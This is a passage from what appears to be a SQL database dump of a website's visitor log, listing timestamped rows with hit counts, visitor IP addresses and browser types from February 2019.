125.153','chrome'),(385460,1549993697,1,1,0,0,'91.196.178.73','firefox'),(385461,1549993797,1,1,0,0,'66.249.75.142','chrome'),(385462,1549994379,1,1,0,0,'5.188.210.53','chrome'),(385463,1549994407,1,1,0,0,'66.249.75.21','chrome'),(385464,1549994446,3,3,0,0,'216.244.66.241','other'),(385465,1549994669,1,1,0,0,'62.80.191.198','chrome'),(385466,1549994732,1,1,0,0,'34.228.42.90','other'),(385467,1549995077,1,1,0,0,'46.229.168.138','other'),(385468,1549995725,1,1,0,0,'95.163.255.96','other'),(385469,1549995735,1,1,0,0,'66.249.75.22','chrome'),(385470,1549995750,1,1,0,0,'66.249.75.21','chrome'),(385471,1549995764,1,1,0,0,'188.163.41.151','chrome'),(385472,1549995837,1,1,0,0,'207.241.229.235','other'),(385473,1549996017,1,1,0,0,'66.249.69.148','chrome'),(385474,1549996411,1,1,0,0,'95.108.213.4','other'),(385475,1549996418,2,2,0,0,'5.45.207.79','other'),(385476,1549997091,1,1,0,0,'34.228.42.90','other'),(385477,1549997258,1,1,0,0,'5.45.207.19','other'),(385478,1549997295,1,1,0,0,'180.76.15.147','other'),(385479,1549997427,1,1,0,0,'217.118.86.60','firefox'),(385480,1549997438,1,1,0,0,'178.154.244.11','other'),(385481,1549997851,1,1,0,0,'8.29.198.25','other'),(385482,1549998011,1,1,0,0,'66.249.75.22','chrome'),(385483,1549998098,1,1,0,0,'91.196.178.134','chrome'),(385484,1549998176,1,1,0,0,'34.228.42.90','other'),(385485,1549998279,1,1,0,0,'66.249.69.150','chrome'),(385486,1549998548,1,1,0,0,'66.249.69.148','chrome'),(385487,1549998632,1,1,0,0,'157.55.39.29','other'),(385488,1549998762,1,1,0,0,'46.229.168.152','other'),(385489,1549999086,1,1,0,0,'95.163.255.153','other'),(385490,1549999215,4,4,0,0,'216.244.66.241','other'),(385491,1549999272,1,1,0,0,'31.184.238.190','chrome'),(385492,1549999321,1,1,0,0,'8.29.198.26','other'),(385493,1549999732,1,1,0,0,'40.77.167.64','other'),(385494,1549999899,1,1,0,0,'91.196.178.28','other'),(385495,1550000403,1,1,0,0,'46.229.168.153','other'),(385496,1550000496,2,2,0,0,'216.244.66.241','other'),(385497,1550000879,2,2,0,0,'66.249.75.21','chrome'),(385498,1550001459,1,1,0,0,'66.249.75.140','chrome'),(385499,1550002620,1,1,0,0,'66.249.75.21','chrome'),(385500,1550002709,1,1,0,0,'216.244.66.241','other'),(385501,1550002802,1,1,0,0,'207.46.13.204','other'),(385502,1550003889,1,1,0,0,'95.163.255.192','other'),(385503,1550004003,1,1,0,0,'40.77.167.170','other'),(385504,1550004326,1,1,0,0,'46.229.168.151','other'),(385505,1550004468,1,1,0,0,'46.229.168.142','other'),(385506,1550004545,1,1,0,0,'46.229.168.153','other'),(385507,1550004974,1,1,0,0,'5.45.207.19','other'),(385508,1550005222,1,1,0,0,'207.46.13.204','other'),(385509,1550005470,1,1,0,0,'216.244.66.241','other'),(385510,1550005859,1,1,0,0,'66.249.75.144','chrome'),(385511,1550006194,1,1,0,0,'66.249.69.149','chrome'),(385512,1550006333,1,1,0,0,'40.77.167.115','other'),(385513,1550006966,1,1,0,0,'46.229.168.139','other'),(385514,1550007202,1,1,0,0,'66.249.75.21','chrome'),(385515,1550007863,1,1,0,0,'130.180.219.26','chrome'),(385516,1550008072,2,2,0,0,'216.244.66.241','other'),(385517,1550008210,1,1,0,0,'66.249.75.21','chrome'),(385518,1550008527,1,1,0,0,'66.249.75.22','chrome'),(385519,1550008705,1,1,0,0,'8.29.198.27','other'),(385520,1550008756,1,1,0,0,'66.249.75.140','chrome'),(385521,1550008986,1,1,0,0,'66.249.69.149','chrome'),(385522,1550009041,1,1,0,0,'66.249.75.142','chrome'),(385523,1550009946,1,1,0,0,'46.229.168.148','other'),(385524,1550010031,1,1,0,0,'95.163.255.197','other'),(385525,1550010164,1,1,0,0,'8.29.198.26','other'),(385526,1550010722,2,2,0,0,'66.249.75.20','chrome'),(385527,1550010810,1,1,0,0,'40.77.167.115','other'),(385528,1550010884,2,2,0,0,'207.46.13.204','other'),(385529,1550011326,1,1,0,0,'216.244.66.241','other'),(385530,1550011594,1,1,0,0,'91.196.178.66','chrome'),(385531,1550011663,1,1,0,0,'66.249.75.20','chrome'),(385532,1550012202,2,2,0,0,'66.249.69.150','chrome'),(385533,1550012574,1,1,0,0,'66.249.75.22','chrome'),(385534,1550012717,1,1,0,0,'60.191.38.77','firefox'),(385535,1550012883,1,1,0,0,'157.55.39.214','other'),(385536,1550013089,3,3,0,0,'216.244.66.241','other'),(385537,1550013233,1,1,0,0,'46.229.168.139','other'),(385538,1550014113,1,1,0,0,'46.229.168.130','other'),(385539,1550014122,1,1,0,0,'66.249.75.21','chrome'),(385540,1550014215,1,1,0,0,'60.191.38.77','firefox'),(385541,1550014289,1,1,0,0,'207.46.13.29','other'),(385542,1550014961,1,1,0,0,'46.229.168.150','other'),(385543,1550015170,1,1,0,0,'46.211.64.108','chrome'),(385544,1550015458,1,1,0,0,'95.163.255.156','other'),(385545,1550015533,1,1,0,0,'95.163.255.97','other'),(385546,1550015539,1,1,0,0,'95.163.255.98','other'),(385547,1550015615,1,1,0,0,'95.163.255.178','other'),(385548,1550016684,2,2,0,0,'46.229.168.133','other'),(385549,1550016708,1,1,0,0,'157.55.39.214','other'),(385550,1550017254,1,1,0,0,'66.249.75.144','chrome'),(385551,1550017381,1,1,0,0,'46.229.168.140','other'),(385552,1550017964,1,1,0,0,'157.55.39.214','other'),(385553,1550018299,1,1,0,0,'66.249.69.148','chrome'),(385554,1550018366,3,3,0,0,'216.244.66.241','other'),(385555,1550018579,1,1,0,0,'66.249.75.20','chrome'),(385556,1550019182,1,1,0,0,'46.229.168.147','other'),(385557,1550019559,1,1,0,0,'8.29.198.26','other'),(385558,1550020085,2,2,0,0,'46.229.168.137','other'),(385559,1550020425,1,1,0,0,'94.180.169.7','chrome'),(385560,1550020920,1,1,0,0,'46.229.168.147','other'),(385561,1550020997,1,1,0,0,'8.29.198.27','other'),(385562,1550021227,3,3,0,0,'216.244.66.241','other'),(385563,1550021344,1,1,0,0,'157.55.39.109','other'),(385564,1550021682,1,1,0,0,'66.249.69.150','chrome'),(385565,1550022100,1,1,0,0,'40.77.167.217','other'),(385566,1550022276,1,1,0,0,'13.228.136.105','firefox'),(385567,1550023348,1,1,0,0,'66.249.75.22','chrome'),(385568,1550023947,1,1,0,0,'66.249.75.21','chrome'),(385569,1550024005,1,1,0,0,'207.46.13.59','other'),(385570,1550024139,1,1,0,0,'157.55.39.109','other'),(385571,1550024718,1,1,0,0,'216.244.66.241','other'),(385572,1550025721,1,1,0,0,'66.249.69.148','chrome'),(385573,1550025748,1,1,0,0,'66.249.75.21','chrome'),(385574,1550025855,2,2,0,0,'34.209.126.231','chrome'),(385575,1550026286,2,2,0,0,'66.249.69.149','chrome'),(385576,1550026369,1,1,0,0,'46.229.168.140','other'),(385577,1550026430,1,1,0,0,'66.249.75.142','chrome'),(385578,1550027274,1,1,0,0,'66.249.69.150','chrome'),(385579,1550027280,1,1,0,0,'216.244.66.241','other'),(385580,1550028487,1,1,0,0,'66.249.75.20','chrome'),(385581,1550028502,1,1,0,0,'95.163.255.176','other'),(385582,1550028521,1,1,0,0,'95.163.255.183','other'),(385583,1550028523,1,1,0,0,'95.163.255.188','other'),(385584,1550030069,3,3,0,0,'216.244.66.241','other'),(385585,1550030396,1,1,0,0,'8.29.198.26','other'),(385586,1550030760,1,1,0,0,'66.249.66.154','chrome'),(385587,1550031099,1,1,0,0,'157.55.39.220','other'),(385588,1550031837,1,1,0,0,'8.29.198.25','other'),(385589,1550032292,1,1,0,0,'207.46.13.183','other'),(385590,1550032372,1,1,0,0,'66.249.66.40','chrome'),(385591,1550032513,1,1,0,0,'46.229.168.136','other'),(385592,1550032544,1,1,0,0,'40.77.167.218','other'),(385593,1550032747,3,3,0,0,'66.249.66.154','chrome'),(385594,1550033101,1,1,0,0,'157.55.39.220','other'),(385595,1550033214,1,1,0,0,'216.244.66.241','other'),(385596,1550034286,1,1,0,0,'40.77.167.48','other'),(385597,1550034692,1,1,0,0,'91.196.178.134','firefox'),(385598,1550034886,1,1,0,0,'207.46.13.183','other'),(385599,1550034944,2,0,2,0,'66.249.66.156',''),(385600,1550034967,1,0,1,0,'66.249.66.152',''),(385601,1550035265,1,1,0,0,'46.229.168.144','other'),(385602,1550035666,1,1,0,0,'40.77.167.48','other'),(385603,1550035813,1,1,0,0,'216.244.66.241','other'),(385604,1550036260,1,1,0,0,'66.249.66.154','chrome'),(385605,1550036284,1,1,0,0,'207.46.13.183','other'),(385606,1550037119,1,1,0,0,'157.55.39.220','other'),(385607,1550037370,1,1,0,0,'180.76.15.152','other'),(385608,1550037923,1,1,0,0,'66.249.66.156','chrome'),(385609,1550038387,1,1,0,0,'192.42.116.19','other'),(385610,1550038390,2,2,0,0,'216.244.66.241','other'),(385611,1550038414,2,2,0,0,'66.249.66.154','chrome'),(385612,1550038433,1,1,0,0,'40.77.167.218','other'),(385613,1550038548,1,1,0,0,'157.55.39.220','other'),(385614,1550039527,1,1,0,0,'46.229.168.144','other'),(385615,1550039853,1,1,0,0,'66.249.66.156','chrome'),(385616,1550040071,1,1,0,0,'157.55.39.220','other'),(385617,1550040159,1,1,0,0,'46.229.168.145','other'),(385618,1550040344,1,1,0,0,'46.229.168.140','other'),(385619,1550040414,1,1,0,0,'95.163.255.93','other'),(385620,1550040518,1,1,0,0,'91.196.178.86','chrome'),(385621,1550040846,1,1,0,0,'95.163.255.174','other'),(385622,1550040848,1,1,0,0,'95.163.255.158','other'),(385623,1550040850,1,1,0,0,'95.163.255.162','other'),(385624,1550040945,1,1,0,0,'46.229.168.138','other'),(385625,1550041233,1,1,0,0,'8.29.198.27','other'),(385626,1550042140,2,2,0,0,'91.196.178.135','chrome'),(385627,1550042497,2,2,0,0,'91.196.178.87','chrome'),(385628,1550042675,1,1,0,0,'8.29.198.27','other'),(385629,1550042718,1,1,0,0,'66.249.66.156','chrome'),(385630,1550042758,1,1,0,0,'66.249.66.152','chrome'),(385631,1550042785,1,1,0,0,'46.149.92.176','chrome'),(385632,1550043077,1,1,0,0,'66.249.66.42','chrome'),(385633,1550043924,3,3,0,0,'91.196.177.15','chrome'),(385634,1550043982,1,1,0,0,'216.244.66.241','other'),(385635,1550044137,1,1,0,0,'66.249.66.152','chrome'),(385636,1550044403,1,1,0,0,'66.249.66.156','chrome'),(385637,1550044420,2,2,0,0,'66.249.66.44','chrome'),(385638,1550044916,1,1,0,0,'40.77.167.218','other'),(385639,1550044989,1,1,0,0,'91.196.178.82','chrome'),(385640,1550045509,1,1,0,0,'66.249.66.152','chrome'),(385641,1550045600,1,1,0,0,'180.76.15.146','other'),(385642,1550045605,1,1,0,0,'207.46.13.242','other'),(385643,1550045834,1,1,0,0,'157.55.39.243','other'),(385644,1550046164,1,1,0,0,'46.229.168.141','other'),(385645,1550046346,1,1,0,0,'95.163.255.96','other'),(385646,1550046444,1,1,0,0,'178.92.87.22','firefox'),(385647,1550046474,2,2,0,0,'216.244.66.241','other'),(385648,1550046584,2,2,0,0,'66.249.66.156','chrome'),(385649,1550047520,2,2,0,0,'176.105.192.108','chrome'),(385650,1550047651,1,1,0,0,'46.229.168.141','other'),(385651,1550048291,1,1,0,0,'13.66.139.0','other'),(385652,1550048701,1,1,0,0,'207.46.13.150','other'),(385653,1550048914,1,1,0,0,'66.249.66.40','chrome'),(385654,1550048946,1,1,0,0,'66.249.66.152','chrome'),(385655,1550050683,1,1,0,0,'207.46.13.242','other'),(385656,1550050806,1,1,0,0,'46.229.168.139','other'),(385657,1550050882,1,1,0,0,'146.185.157.242','chrome'),(385658,1550051218,1,1,0,0,'66.249.66.152','chrome'),(385659,1550051787,2,2,0,0,'216.244.66.241','other'),(385660,1550051884,1,1,0,0,'40.77.167.177','other'),(385661,1550052082,1,1,0,0,'8.29.198.26','other'),(385662,1550052247,2,2,0,0,'157.55.39.121','other'),(385663,1550052442,2,2,0,0,'94.178.96.169','chrome'),(385664,1550052522,2,2,0,0,'95.213.141.126','opera'),(385665,1550052673,1,1,0,0,'95.163.255.195','other'),(385666,1550052935,1,1,0,0,'216.244.66.241','other'),(385667,1550053516,2,2,0,0,'66.249.66.156','chrome'),(385668,1550053527,1,1,0,0,'8.29.198.25','other'),(385669,1550053606,1,1,0,0,'207.46.13.242','other'),(385670,1550054057,1,1,0,0,'216.244.66.241','other'),(385671,1550054360,1,1,0,0,'209.17.96.226','other'),(385672,1550054633,2,2,0,0,'91.196.178.103','chrome'),(385673,1550054784,1,1,0,0,'46.229.168.145','other'),(385674,1550054884,1,1,0,0,'94.45.49.222','chrome'),(385675,1550055181,1,1,0,0,'46.229.168.136','other'),(385676,1550055651,1,1,0,0,'217.118.86.60','firefox'),(385677,1550055765,1,1,0,0,'66.249.66.154','chrome'),(385678,1550056412,1,1,0,0,'91.196.178.68','chrome'),(385679,1550056461,1,1,0,0,'46.229.168.145','other'),(385680,1550056586,1,1,0,0,'40.77.167.116','other'),(385681,1550056838,1,1,0,0,'46.229.168.130','other'),(385682,1550057761,1,1,0,0,'66.249.66.154','chrome'),(385683,1550058038,1,1,0,0,'46.229.168.129','other'),(385684,1550058039,1,1,0,0,'66.249.66.152','chrome'),(385685,1550058273,1,1,0,0,'66.249.66.156','chrome'),(385686,1550058494,1,1,0,0,'180.76.15.23','other'),(385687,1550059026,2,2,0,0,'66.249.66.154','chrome'),(385688,1550059506,1,1,0,0,'66.249.66.152','chrome'),(385689,1550059593,1,1,0,0,'46.229.168.133','other'),(385690,1550059755,1,1,0,0,'91.196.178.180','chrome'),(385691,1550059764,1,1,0,0,'91.196.178.82','chrome'),(385692,1550060017,1,1,0,0,'91.196.178.103','chrome'),(385693,1550060101,1,1,0,0,'157.55.39.53','other'),(385694,1550060292,2,2,0,0,'216.244.66.241','other'),(385695,1550060311,1,1,0,0,'66.249.66.222','chrome'),(385696,1550060439,1,1,0,0,'91.196.178.172','chrome'),(385697,1550060536,1,1,0,0,'207.46.13.242','other'),(385698,1550060545,1,1,0,0,'91.196.178.130','firefox'),(385699,1550060888,1,1,0,0,'91.196.178.129','firefox'),(385700,1550061125,1,1,0,0,'91.233.49.253','chrome'),(385701,1550061343,1,1,0,0,'66.249.66.220','chrome'),(385702,1550061678,2,2,0,0,'66.249.66.154','chrome'),(385703,1550061829,1,1,0,0,'207.46.13.242','other'),(385704,1550061861,1,1,0,0,'46.229.168.136','other'),(385705,1550062306,1,1,0,0,'157.55.39.121','other'),(385706,1550062584,1,1,0,0,'66.249.66.156','chrome'),(385707,1550062807,2,2,0,0,'216.244.66.241','other'),(385708,1550062929,1,1,0,0,'8.29.198.27','other'),(385709,1550063207,2,2,0,0,'157.55.39.53','other'),(385710,1550063405,1,1,0,0,'157.55.39.51','other'),(385711,1550063442,1,1,0,0,'103.221.221.149','firefox'),(385712,1550064119,1,1,0,0,'216.244.66.241','other'),(385713,1550064123,1,1,0,0,'51.15.21.189','other'),(385714,1550064358,1,1,0,0,'8.29.198.27','other'),(385715,1550064383,1,1,0,0,'66.249.66.154','chrome'),(385716,1550064483,1,1,0,0,'46.229.168.146','other'),(385717,1550064704,1,1,0,0,'213.108.45.138','firefox'),(385718,1550064762,1,1,0,0,'46.229.168.139','other'),(385719,1550064867,1,1,0,0,'66.249.66.152','chrome'),(385720,1550064917,1,1,0,0,'40.77.167.193','other'),(385721,1550065407,1,1,0,0,'91.196.177.46','chrome'),(385722,1550065419,1,1,0,0,'46.229.168.150','other'),(385723,1550065430,1,1,0,0,'91.124.182.170','firefox'),(385724,1550065496,3,3,0,0,'216.244.66.241','other'),(385725,1550065861,1,1,0,0,'91.196.178.91','firefox'),(385726,1550066058,1,1,0,0,'91.209.11.236','other'),(385727,1550066362,1,1,0,0,'46.229.168.147','other'),(385728,1550066640,1,1,0,0,'66.249.66.44','chrome'),(385729,1550066859,6,6,0,0,'216.244.66.241','other'),(385730,1550067042,1,1,0,0,'66.249.66.154','chrome'),(385731,1550067073,1,1,0,0,'66.249.66.156','chrome'),(385732,1550067727,1,1,0,0,'157.55.39.51','other'),(385733,1550067825,2,2,0,0,'216.244.66.241','other'),(385734,1550068051,1,1,0,0,'37.54.161.135','chrome'),(385735,1550068521,1,1,0,0,'66.249.66.156','chrome'),(385736,1550068555,1,1,0,0,'178.92.251.40','firefox'),(385737,1550068736,1,1,0,0,'91.196.178.172','chrome'),(385738,1550069256,1,1,0,0,'66.249.66.44','chrome'),(385739,1550069467,1,1,0,0,'37.53.123.48','chrome'),(385740,1550069586,1,1,0,0,'157.55.39.51','other'),(385741,1550069770,1,1,0,0,'37.53.90.175','chrome'),(385742,1550070024,2,2,0,0,'157.55.39.121','other'),(385743,1550070124,1,1,0,0,'78.158.192.72','chrome'),(385744,1550070314,2,2,0,0,'216.244.66.241','other'),(385745,1550070642,1,1,0,0,'66.249.66.44','chrome'),(385746,1550071296,1,1,0,0,'157.55.39.51','other'),(385747,1550071843,1,1,0,0,'40.77.167.59','other'),(385748,1550072425,1,1,0,0,'157.55.39.53','other'),(385749,1550072548,1,1,0,0,'66.249.66.152','chrome'),(385750,1550073181,1,1,0,0,'66.249.66.42','chrome'),(385751,1550073373,1,1,0,0,'40.77.167.59','other'),(385752,1550073772,1,1,0,0,'8.29.198.27','other'),(385753,1550074010,1,1,0,0,'66.249.66.156','chrome'),(385754,1550074184,1,1,0,0,'46.229.168.147','other'),(385755,1550074283,1,1,0,0,'207.46.13.228','other'),(385756,1550074589,1,1,0,0,'46.229.168.144','other'),(385757,1550074616,1,1,0,0,'40.77.167.59','other'),(385758,1550075203,1,1,0,0,'8.29.198.26','other'),(385759,1550075379,1,1,0,0,'66.249.66.40','chrome'),(385760,1550075588,1,1,0,0,'66.249.66.44','chrome'),(385761,1550075615,1,1,0,0,'157.55.39.53','other'),(385762,1550075651,1,1,0,0,'66.249.66.156','chrome'),(385763,1550075695,1,1,0,0,'66.249.66.154','chrome'),(385764,1550075833,2,2,0,0,'95.163.255.98','other'),(385765,1550076409,1,1,0,0,'91.196.178.44','chrome'),(385766,1550076911,1,1,0,0,'66.249.66.156','chrome'),(385767,1550077035,2,2,0,0,'46.229.168.130','other'),(385768,1550077092,1,1,0,0,'66.249.66.152','chrome'),(385769,1550077579,1,1,0,0,'66.249.66.42','chrome'),(385770,1550078084,1,1,0,0,'46.229.168.142','other'),(385771,1550078163,1,1,0,0,'157.55.39.53','other'),(385772,1550078348,1,1,0,0,'91.209.11.236','other'),(385773,1550078496,2,2,0,0,'66.249.66.152','chrome'),(385774,1550078609,3,3,0,0,'216.244.66.241','other'),(385775,1550078916,1,1,0,0,'66.249.66.154','chrome'),(385776,1550078950,1,1,0,0,'217.118.86.60','firefox'),(385777,1550079331,1,1,0,0,'46.211.113.96','chrome'),(385778,1550079561,1,1,0,0,'91.209.11.236','other'),(385779,1550079579,1,1,0,0,'185.160.61.182','chrome'),(385780,1550079626,1,1,0,0,'46.229.168.148','other'),(385781,1550079749,1,1,0,0,'87.250.224.65','other'),(385782,1550079776,1,1,0,0,'157.55.39.51','other'),(385783,1550079872,1,1,0,0,'46.229.168.141','other'),(385784,1550080103,1,1,0,0,'40.77.167.84','other'),(385785,1550080152,1,1,0,0,'141.8.132.16','other'),(385786,1550080461,2,2,0,0,'5.45.207.79','other'),(385787,1550080737,1,1,0,0,'95.163.255.95','other'),(385788,1550080788,1,1,0,0,'95.163.255.92','other'),(385789,1550080795,1,1,0,0,'185.160.61.182','chrome'),(385790,1550080825,1,1,0,0,'141.8.142.103','other'),(385791,1550081061,1,1,0,0,'178.154.244.11','other'),(385792,1550081472,1,1,0,0,'46.229.168.149','other'),(385793,1550081497,1,1,0,0,'46.229.168.134','other'),(385794,1550081847,1,1,0,0,'207.46.13.228','other'),(385795,1550082168,1,1,0,0,'66.249.66.44','chrome'),(385796,1550083283,1,1,0,0,'46.229.168.140','other'),(385797,1550083413,1,1,0,0,'66.249.66.152','chrome'),(385798,1550084263,1,1,0,0,'216.244.66.241','other'),(385799,1550084628,1,1,0,0,'8.29.198.27','other'),(385800,1550084645,1,1,0,0,'66.249.66.154','chrome'),(385801,1550085182,1,1,0,0,'207.46.13.66','other'),(385802,1550085316,2,2,0,0,'66.249.66.152','chrome'),(385803,1550086047,1,1,0,0,'8.29.198.27','other'),(385804,1550086773,1,1,0,0,'216.244.66.241','other'),(385805,1550086788,1,1,0,0,'207.46.13.66','other'),(385806,1550087354,1,1,0,0,'5.45.207.79','other'),(385807,1550087365,1,1,0,0,'5.45.207.19','other'),(385808,1550087443,1,1,0,0,'180.76.15.135','other'),(385809,1550087507,1,1,0,0,'40.77.167.84','other'),(385810,1550089269,2,2,0,0,'66.249.66.154','chrome'),(385811,1550089907,1,1,0,0,'66.249.66.152','chrome'),(385812,1550090124,1,1,0,0,'46.229.168.142','other'),(385813,1550090468,1,1,0,0,'207.46.13.142','other'),(385814,1550090511,1,1,0,0,'207.46.13.66','other'),(385815,1550091274,1,1,0,0,'46.229.168.135','other'),(385816,1550091482,1,1,0,0,'91.209.11.236','other'),(385817,1550091676,1,1,0,0,'95.163.255.97','other'),(385818,1550092072,2,2,0,0,'216.244.66.241','other'),(385819,1550092168,1,1,0,0,'207.46.13.142','other'),(385820,1550092578,1,1,0,0,'141.8.183.23','other'),(385821,1550092657,1,1,0,0,'46.229.168.138','other'),(385822,1550093782,1,1,0,0,'207.46.13.184','other'),(385823,1550094049,1,1,0,0,'207.46.13.142','other'),(385824,1550095081,1,1,0,0,'40.77.167.188','other'),(385825,1550095194,2,2,0,0,'66.249.66.156','chrome'),(385826,1550095473,1,1,0,0,'8.29.198.26','other'),(385827,1550096017,1,1,0,0,'207.46.13.184','other'),(385828,1550096548,1,1,0,0,'91.209.11.236','other'),(385829,1550096681,1,1,0,0,'40.77.167.136','other'),(385830,1550096797,1,1,0,0,'46.229.168.129','other'),(385831,1550096901,1,1,0,0,'8.29.198.25','other'),(385832,1550097045,1,1,0,0,'95.163.255.182','other'),(385833,1550097108,48,48,0,0,'144.76.176.171','other'),(385834,1550097210,1,1,0,0,'46.229.168.147','other'),(385835,1550097964,1,1,0,0,'66.249.66.154','chrome'),(385836,1550098981,1,1,0,0,'66.249.66.156','chrome'),(385837,1550098997,1,1,0,0,'46.229.168.146','other'),(385838,1550099181,1,1,0,0,'46.229.168.150','other'),(385839,1550099322,1,1,0,0,'66.249.66.154','chrome'),(385840,1550099521,1,1,0,0,'66.249.66.44','chrome'),(385841,1550099931,1,1,0,0,'66.249.66.152','chrome'),(385842,1550100086,1,1,0,0,'46.229.168.130','other'),(385843,1550100204,1,1,0,0,'46.229.168.133','other'),(385844,1550101038,19,19,0,0,'5.189.132.132','other'),(385845,1550101681,1,1,0,0,'207.46.13.143','other'),(385846,1550101969,1,1,0,0,'207.46.13.184','other'),(385847,1550102046,1,1,0,0,'66.249.66.152','chrome'),(385848,1550102373,2,2,0,0,'66.249.66.154','chrome'),(385849,1550102849,1,1,0,0,'95.163.255.93','other'),(385850,1550102926,1,1,0,0,'216.244.66.241','other'),(385851,1550102939,1,1,0,0,'46.229.168.149','other'),(385852,1550102977,1,1,0,0,'46.229.168.142','other'),(385853,1550103164,1,1,0,0,'52.53.201.78','chrome'),(385854,1550104676,1,1,0,0,'46.229.168.137','other'),(385855,1550104731,1,1,0,0,'66.249.66.154','chrome'),(385856,1550104860,1,1,0,0,'66.249.66.152','chrome'),(385857,1550105209,2,2,0,0,'40.77.167.98','other'),(385858,1550105544,1,1,0,0,'216.244.66.241','other'),(385859,1550105782,1,1,0,0,'66.249.66.40','chrome'),(385860,1550106177,2,2,0,0,'40.77.167.98','other'),(385861,1550106310,1,1,0,0,'8.29.198.25','other'),(385862,1550106554,1,1,0,0,'46.229.168.141','other'),(385863,1550107739,1,1,0,0,'8.29.198.27','other'),(385864,1550108081,1,1,0,0,'157.55.39.110','other'),(385865,1550108223,1,1,0,0,'46.229.168.149','other'),(385866,1550108487,2,2,0,0,'216.244.66.241','other'),(385867,1550108623,1,1,0,0,'95.163.255.172','other'),(385868,1550108655,1,1,0,0,'95.163.255.186','other'),(385869,1550109131,1,1,0,0,'66.249.66.42','chrome'),(385870,1550110336,1,1,0,0,'66.249.66.156','chrome'),(385871,1550111032,2,2,0,0,'66.249.66.42','chrome'),(385872,1550111769,2,2,0,0,'66.249.66.152','chrome'),(385873,1550111890,1,1,0,0,'66.249.66.156','chrome'),(385874,1550112626,2,2,0,0,'54.190.39.163','chrome'),(385875,1550112677,1,1,0,0,'184.174.26.100','chrome'),(385876,1550112686,1,1,0,0,'207.46.13.53','other'),(385877,1550113686,1,1,0,0,'46.229.168.148','other'),(385878,1550113923,1,1,0,0,'216.244.66.241','other'),(385879,1550114211,1,1,0,0,'157.55.39.110','other'),(385880,1550114648,1,1,0,0,'66.249.66.40','chrome'),(385881,1550114834,1,1,0,0,'46.229.168.134','other'),(385882,1550115296,1,1,0,0,'91.196.178.93','chrome'),(385884,1550115495,3,3,0,0,'157.55.39.143','other'),(385885,1550115602,1,1,0,0,'66.249.66.42','chrome'),(385886,1550115606,1,1,0,0,'46.229.168.130','other'),(385887,1550115804,1,1,0,0,'66.249.66.152','chrome'),(385888,1550116751,1,1,0,0,'66.249.66.154','chrome'),(385889,1550117147,1,1,0,0,'8.29.198.25','other'),(385890,1550117471,1,1,0,0,'66.249.66.44','chrome'),(385891,1550117616,1,1,0,0,'66.249.66.40','chrome'),(385892,1550118499,1,1,0,0,'46.229.168.145','other'),(385893,1550118577,1,1,0,0,'8.29.198.25','other'),(385894,1550119105,1,1,0,0,'66.249.66.156','chrome'),(385895,1550119248,2,2,0,0,'66.249.66.154','chrome'),(385896,1550119590,1,1,0,0,'94.231.180.43','chrome'),(385897,1550119668,1,1,0,0,'95.163.255.96','other'),(385898,1550119785,1,1,0,0,'157.55.39.143','other'),(385899,1550119878,5,5,0,0,'216.244.66.241','other'),(385900,1550119880,1,1,0,0,'95.163.255.161','other'),(385901,1550119894,1,1,0,0,'91.196.178.61','chrome'),(385902,1550120992,1,1,0,0,'46.229.168.145','other'),(385903,1550121483,1,1,0,0,'66.249.66.40','chrome'),(385904,1550121727,1,1,0,0,'207.46.13.54','other'),(385905,1550122128,1,1,0,0,'157.55.39.143','other'),(385906,1550122413,2,2,0,0,'216.244.66.241','other'),(385907,1550123040,2,2,0,0,'66.249.66.44','chrome'),(385908,1550123715,1,1,0,0,'46.229.168.144','other'),(385909,1550123897,1,1,0,0,'46.229.168.147','other'),(385910,1550123980,1,1,0,0,'157.55.39.143','other'),(385911,1550124493,1,1,0,0,'46.229.168.150','other'),(385912,1550124623,1,1,0,0,'185.220.101.56','other'),(385913,1550124864,3,3,0,0,'216.244.66.241','other'),(385914,1550124946,1,1,0,0,'40.77.167.88','other'),(385915,1550125901,2,2,0,0,'91.196.178.87','chrome'),(385916,1550126496,1,1,0,0,'207.46.13.89','other'),(385917,1550127035,1,1,0,0,'46.229.168.133','other'),(385918,1550127093,1,1,0,0,'176.113.170.104','chrome'),(385919,1550127726,1,1,0,0,'91.196.178.78','chrome'),(385920,1550127901,1,1,0,0,'91.196.178.87','chrome'),(385921,1550127950,1,1,0,0,'40.77.167.88','other'),(385922,1550127973,1,1,0,0,'91.196.178.165','chrome'),(385923,1550127978,1,1,0,0,'66.249.66.44','chrome'),(385924,1550128001,1,1,0,0,'8.29.198.27','other'),(385925,1550128473,2,2,0,0,'157.55.39.9','other'),(385926,1550128902,1,1,0,0,'37.55.59.141','chrome'),(385927,1550129139,1,1,0,0,'91.196.178.70','chrome'),(385928,1550129209,1,1,0,0,'92.113.180.6','chrome'),(385929,1550129268,1,1,0,0,'40.77.167.129','other'),(385930,1550129447,1,1,0,0,'8.29.198.26','other'),(385931,1550129629,1,1,0,0,'178.92.130.57','chrome'),(385932,1550129936,1,1,0,0,'66.249.66.156','chrome'),(385933,1550130021,3,3,0,0,'216.244.66.241','other'),(385934,1550130025,1,1,0,0,'66.249.66.152','chrome'),(385935,1550130034,1,1,0,0,'95.163.255.93','other'),(385936,1550130154,1,1,0,0,'66.249.66.42','chrome'),(385937,1550130827,1,1,0,0,'46.229.168.130','other'),(385938,1550130873,1,1,0,0,'95.163.255.95','other'),(385939,1550131422,1,1,0,0,'207.46.13.250','other'),(385940,1550131582,1,1,0,0,'37.52.107.42','chrome'),(385941,1550132169,1,1,0,0,'95.163.255.95','other'),(385942,1550132171,1,1,0,0,'91.196.178.87','chrome'),(385943,1550132454,1,1,0,0,'46.229.168.153','other'),(385944,1550132631,5,5,0,0,'216.244.66.241','other'),(385945,1550132671,1,1,0,0,'66.249.66.156','chrome'),(385946,1550133004,1,1,0,0,'66.249.66.152','chrome'),(385947,1550133164,1,1,0,0,'66.249.66.154','chrome'),(385948,1550133216,1,1,0,0,'46.211.10.78','chrome'),(385949,1550133811,1,1,0,0,'66.249.66.156','chrome'),(385950,1550133829,1,1,0,0,'46.229.168.134','other'),(385951,1550134726,1,1,0,0,'81.162.247.170','chrome'),(385952,1550134952,1,1,0,0,'91.196.178.87','chrome'),(385953,1550135078,1,1,0,0,'23.228.96.82','chrome'),(385954,1550136423,2,2,0,0,'66.249.66.154','chrome'),(385955,1550136594,1,1,0,0,'46.229.168.150','other'),(385956,1550136917,2,2,0,0,'66.249.66.222','chrome'),(385957,1550137163,2,2,0,0,'178.92.143.115','chrome'),(385958,1550138139,1,1,0,0,'66.249.66.154','chrome'),(385959,1550138188,3,3,0,0,'216.244.66.241','other'),(385961,1550138193,1,1,0,0,'91.196.178.87','chrome'),(385962,1550138255,1,1,0,0,'37.53.166.196','chrome'),(385963,1550138519,1,1,0,0,'66.249.66.42','chrome'),(385964,1550138635,2,2,0,0,'46.229.